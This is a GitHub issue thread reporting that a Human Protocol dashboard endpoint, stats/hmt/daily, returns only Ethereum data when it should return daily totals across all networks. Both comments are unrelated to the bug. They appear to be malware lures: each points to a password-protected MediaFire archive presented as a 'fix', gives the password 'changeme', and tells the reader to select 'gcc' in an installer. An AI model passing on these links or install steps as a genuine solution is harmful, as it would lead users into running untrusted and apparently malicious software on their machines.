### ISSUE TITLE
[Dashboard] stats/hmt/daily returning wrong data

### ISSUE THREAD

**Issue by portuu3** [humanprotocol/human-protocol#2455]
**Describe the bug**
It is returning the data for Ethereum network.

**To Reproduce**
Call `stats/hmt/daily` endpoint

**Expected behavior**
It should be returning the data as the sum of all networks by day

**Screenshots**

![Image](https://github.com/user-attachments/assets/2281f785-276d-4c51-ada6-8ea2d20eafc7)

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
